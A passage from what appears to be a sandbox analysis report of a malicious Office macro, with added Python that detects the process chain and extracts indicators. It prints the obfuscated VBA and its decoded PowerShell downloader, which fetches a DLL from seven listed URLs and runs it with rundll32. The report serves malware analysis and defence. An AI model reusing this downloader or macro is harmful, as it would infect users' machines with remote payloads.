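        parent = by_pid.get(e["ppid"])
        parent_img = image_name(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # Stage 1: an Office process spawning a shell or script host.
        if parent_img in OFFICE and img in SHELLS:
            hits.add((e["pid"], "office_spawns_shell"))
        # Stage 2: download and in-memory evaluation in the same command line.
        # Either alone is common in admin scripts; together they are the downloader.
        if IEX_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
            hits.add((e["pid"], "powershell_download_exec"))
        # Stage 3: a loader running a DLL dropped under ProgramData, and any loader
        # whose ancestry leads back to an Office application.
        if img in LOADERS:
            if PROGRAMDATA_DLL_RE.search(cmd):
                hits.add((e["pid"], "rundll32_programdata_dll"))
            if any(a in OFFICE for a in ancestors(e["pid"], by_pid)):
                hits.add((e["pid"], "rundll32_descends_from_office"))
    return hits


if __name__ == "__main__":
    for pid, rule in sorted(detect(EVENTS)):
        print(pid, rule)
```

The ancestry walk is what ties the rundll32 event back to Word even though its direct parent is powershell.exe; a rule that only looks at parent/child pairs sees three unrelated low-severity events instead of one chain.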

APIs          Meta Information
Run           Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw
CreateObject  Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw
Replace       Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw

Strings       Decrypted Strings
"celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\"".""Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"

Line  Instruction (Meta Information indented beneath the instruction it belongs to)
107   Private Sub Document_Open()
107   Dim gzjohestiha4otihsdoa8ef as String
      [executed]
108   fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"
109   End Sub

APIs          Meta Information
Replace       Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace
              Replace("celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj="$selftrs=\"helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\".Selfplelfit(\",\");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\"celf:elf\pelfroelfgraelfmdelfatelfa\\\"+elf$relf1+\".delflelfl\";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\"celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\";$aelf=$telfpelfth+\",felf\"+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};";IelfEelfX $delffkj","elf","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Replace("WRIsRIcRIriRIpt.RISRIheRIlRIl","RI","") -> Wscript.Shell
MsgBox

Strings       Decrypted Strings
""""
","
","
","

Line  Instruction (Meta Information indented beneath the instruction it belongs to)
37    Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk as String, dfh3olhuiefoiasihkl as String) as String
38    Dim cbuay7aygsikjbkv as Integer
      [executed]
39    Dim fjoq3wihrpoa8fghoashf as String
39    cbuay7aygsikjbkv = 10
39    fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")
      Meta: Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace  [executed]
40    For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv
41    If sgdyuiwuygiasb > 20 Then
42    MsgBox ","
      Meta: MsgBox
43    Endif
44    Next
45    goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf
46    End Function
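The macro's entire string "decryption" is the single Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "") at line 39: every literal is the plaintext with a fixed delimiter (RI, fA or elf) spliced in at arbitrary positions, and the loop around it can never reach the MsgBox (it counts 1 To 10 and tests for > 20), so it is padding. The scheme is only lossless because the delimiter never occurs in the plaintext; the author even wrote Split as Selfplelfit so that the global strip yields Split rather than leaving a stray "Self". The Python below is an added example, not code from the report or from the sample: it reproduces the Replace on the literals shown in the listing above (the elf string shortened to its first two URLs, with VBA's doubled "" quotes written as single quotes) and then pulls the indicators out of the command line the sandbox recovered. The regexes are tailored to this sample's PowerShell text and are an assumption about its layout, not a general PowerShell parser.

```python
import re

# Obfuscated literals copied from the report's VBA listing. goh4iahwodegiyna89deyfni
# is a plain VBA Replace(text, delimiter, ""); the For loop around it (1 To 10 with
# an "> 20" test) never fires and only pads the function.
SAMPLES = {
    "RI": "WRIsRIcRIriRIpt.RISRIheRIlRIl",
    "fA": "fARDfAS.fADafAtafASpfAacfAe",
    # Leading part of the "elf"-delimited command passed by Document_Open (two of the
    # seven URLs kept); VBA's doubled "" quotes are written as single quotes here.
    "elf": r'celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj="$selftrs=\"helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,',
}

# Full command line as the sandbox recovered it at line 75 (the Object.Run argument).
DECODED_CMD = r"""cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj"""


def vba_replace_decode(text: str, delimiter: str) -> str:
    """Equivalent of the macro's Replace(text, delimiter, "").

    Reversible only when the delimiter never occurs in the plaintext; the three
    delimiters used by this sample (RI, fA, elf) do not, so a bare strip is exact.
    """
    return text.replace(delimiter, "")


def decode_all(samples=SAMPLES) -> dict:
    """Decode every (delimiter -> obfuscated literal) pair."""
    return {delim: vba_replace_decode(text, delim) for delim, text in samples.items()}


def extract_iocs(cmd: str) -> dict:
    """Pull the actionable indicators out of the recovered PowerShell downloader.

    The patterns assume this sample's layout ($tpth drop path, $r2 export suffix);
    they are not a general PowerShell parser.
    """
    urls = re.findall(r'https?://[^\s\\",]+', cmd)
    loader = re.search(r'[a-z]:\\windows\\syswow64\\rundll32\.exe', cmd, re.I)
    drop_dir = re.search(r'\$tpth=\\"([a-z]:\\[^\\"]+\\)', cmd, re.I)
    drop_ext = re.search(r'\+\\"(\.\w+)\\"', cmd)
    export = re.search(r'\$tpth\+\\",(\w+)\\"\+\$r2', cmd)
    return {
        "urls": urls,
        "drop_dir": drop_dir.group(1) if drop_dir else None,
        "drop_ext": drop_ext.group(1) if drop_ext else None,
        "loader": loader.group(0) if loader else None,
        # Export name is this prefix followed by a Get-Random value.
        "export_prefix": export.group(1) if export else None,
        "in_memory_eval": bool(re.search(r"\bIEX\b|Invoke-Expression", cmd)),
        "downloader": "Invoke-WebRequest" in cmd,
        # The loop breaks after the first URL that yields a file on disk.
        "stops_after_first_success": "break;" in cmd,
    }


if __name__ == "__main__":
    for delim, plain in decode_all().items():
        print(f"{delim!r:6} -> {plain}")
    for key, value in extract_iocs(DECODED_CMD).items():
        print(f"{key}: {value}")
```

Because the downloader stops at the first URL that produces a file, a sandbox run normally contacts only one or two of the seven hosts; the static extraction above is the way to get the complete list for blocking.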

Non-Executed Functions

APIs          Meta Information
Clear, FreeFile, Open, ff, LOF, ff, String, Chr, ff, ff, vbNewLine, vbNewLine, Len, Asc, Mid, txt, IIf, Len, Hex, R, BYTES_PER_ROW&, vbNewLine, DoEvents, Len, vbNewLine, vbNewLine

Strings       Decrypted Strings
""""
""""
""""

Line  Instruction (Meta Information indented beneath the instruction it belongs to)
87    Private Function dfjolirhoghwow(ByVal filename$, optional ByVal name$ = "") as String
88    On Error Resume Next
88    Err.Clear
      Meta: Clear
88    Const BYTES_PER_ROW = 480
89    Dim F_Content as String
90    ff& = FreeFile
      Meta: FreeFile
90    Open filename$ For Binary Access Read As # ff
      Meta: Open, ff
91    fs& = LOF(ff)
      Meta: LOF, ff
91    txt$ = String(fs&, Chr(0))
      Meta: String, Chr
92    Get # ff, , txt$
      Meta: ff
92    Close # ff
      Meta: ff
93    F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine
      Meta: vbNewLine
94    F_Content$ = F_Content$ & "" & vbNewLine
      Meta: vbNewLine
95    For i = 1 To Len(txt$)
      Meta: Len
96    R& = Asc(Mid(txt, i, 1))
      Meta: Asc, Mid, txt
97    res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)
      Meta: IIf, Len, Hex, R
98    If i Mod BYTES_PER_ROW& = 0 Then
      Meta: BYTES_PER_ROW&
99    F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
      Meta: vbNewLine
100   res = ""
100   DoEvents
      Meta: DoEvents
101   Endif
102   Next
      Meta: Len
103   If Len(res) Then
      Meta: Len
103   F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
      Meta: vbNewLine
103   Endif
104   F_Content$ = F_Content$ & "" & vbNewLine
      Meta: vbNewLine
105   FileToVBAFunction = F_Content$
106   End Function

APIs (Meta Information): Collection, Workbooks, name, ThisWorkbook, Windows, name, Add, CStr, name, Count, MsgBox, vbCritical, Workbooks, Count, vbTab, vbNewLine, vbNewLine, InputBox, IsNumeric, Workbooks, Val

Strings (Decrypted Strings): "&", ",", ",", ",", "&", ","

| Line | Instruction | Meta Information |
|---|---|---|
| 47 | Function gajowisjd90asdilkf() as Object | |
| 48 | On Error Resume Next | |
| 49 | Dim coll as New Collection, WB as Workbook | Collection |
| 50 | For Each WB in Workbooks | Workbooks |
| 51 | If WB.name <> ThisWorkbook.name Then | name, ThisWorkbook |
| 52 | If Windows(WB.name).Visible Then | Windows, name |
| 52 | coll.Add CStr(WB.name) | Add, CStr, name |
| 52 | Endif | |
| 53 | Endif | |
| 54 | Next WB | Workbooks |
| 55 | Select Case coll.Count | Count |
| 56 | Case 0 | |
| 57 | MsgBox ",", vbCritical, "," | MsgBox, vbCritical |
| 58 | Case 1 | |
| 59 | Set GetAnotherWorkbook = Workbooks(coll(1)) | Workbooks |
| 60 | Case Else | |
| 61 | For i = 1 To coll.Count | Count |
| 62 | txt = txt & i & vbTab & coll(i) & vbNewLine | vbTab, vbNewLine |
| 63 | Next i | Count |
| 64 | msg = "&" & vbNewLine & vbNewLine & txt | vbNewLine |
| 65 | res = InputBox(msg, ",", 1) | InputBox |
| 66 | If IsNumeric(res) Then | IsNumeric |
| 66 | Set GetAnotherWorkbook = Workbooks(coll(Val(res))) | Workbooks, Val |
| 66 | Endif | |
| 67 | End Select | Count |
| 68 | End Function | |

APIs (Meta Information): GetAnotherWorkbook, MsgBox, FullName, vbInformation, MsgBox, vbCritical, Range

Strings (Decrypted Strings): "&", "&", ",", "a2"

| Line | Instruction | Meta Information |
|---|---|---|
| 27 | Sub fbkaw4lkuwgbtlske() | |
| 28 | Dim WB as Workbook | |
| 29 | Set WB = GetAnotherWorkbook | GetAnotherWorkbook |
| 30 | If Not WB Is Nothing Then | |
| 31 | MsgBox "&" & WB.FullName, vbInformation | MsgBox, FullName, vbInformation |
| 32 | Else | |
| 33 | MsgBox ",", vbCritical | MsgBox, vbCritical |
| 33 | Exit Sub | |
| 34 | Endif | |
| 35 | x = WB.Worksheets(1).Range("a2") | Range |
| 36 | End Sub | |

APIs (Meta Information): GetFolderPath, Path, ThisWorkbook, MsgBox, vbInformation

Strings (Decrypted Strings): ",", """", ":"

| Line | Instruction | Meta Information |
|---|---|---|
| 18 | Sub sfoliq3hwoqihepolfijp() | |
| 19 | gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path) | GetFolderPath, Path, ThisWorkbook |
| 20 | If gjpo4jaiwledkgls = "" Then | |
| 20 | Exit Sub | |
| 20 | Endif | |
| 21 | MsgBox ":" & gjpo4jaiwledkgls, vbInformation | MsgBox, vbInformation |
| 22 | End Sub | |

APIs (Meta Information): PathSeparator, Application, Right$, Right$

Strings (Decrypted Strings): ":"

| Line | Instruction | Meta Information |
|---|---|---|
| 9 | Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(optional ByVal Title as String = ",", optional ByVal InitialPath as String = ":") as String | |
| 10 | Dim PS as String | |
| 10 | PS = Application.PathSeparator | PathSeparator, Application |
| 11 | With Application.FileDialog(msoFileDialogFolderPicker) | |
| 12 | If Not Right$(InitialPath, 1) = PS Then | Right$ |
| 12 | InitialPath = InitialPath & PS | |
| 12 | Endif | |
| 13 | . ButtonName = ":" | |
| 13 | . Title = Title | |
| 13 | . InitialFileName = InitialPath | |
| 14 | If . Show <> - 1 Then | |
| 14 | Exit Function | |
| 14 | Endif | |
| 15 | If Not Right$(GetFolderPath, 1) = PS Then | Right$ |
| 15 | GetFolderPath = GetFolderPath & PS | |

                                                                                                                                    15

                                                                                                                                    Endif

                                                                                                                                    16

                                                                                                                                    End With

                                                                                                                                    17

                                                                                                                                    End Function

APIs: FileToVBAFunction, Print
Strings / Decrypted Strings: ","

Sub dfloaswehortiwholehfolsihlkw()
    txt$ = FileToVBAFunction(",", ",")
    Debug.Print txt$
End Sub


                                                                                                                                      Executed Functions

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.753181009.000000000340D000.00000040.00000001.sdmp, Offset: 0340D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_340d000_powershell.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%


                                                                                                                                      Non-executed Functions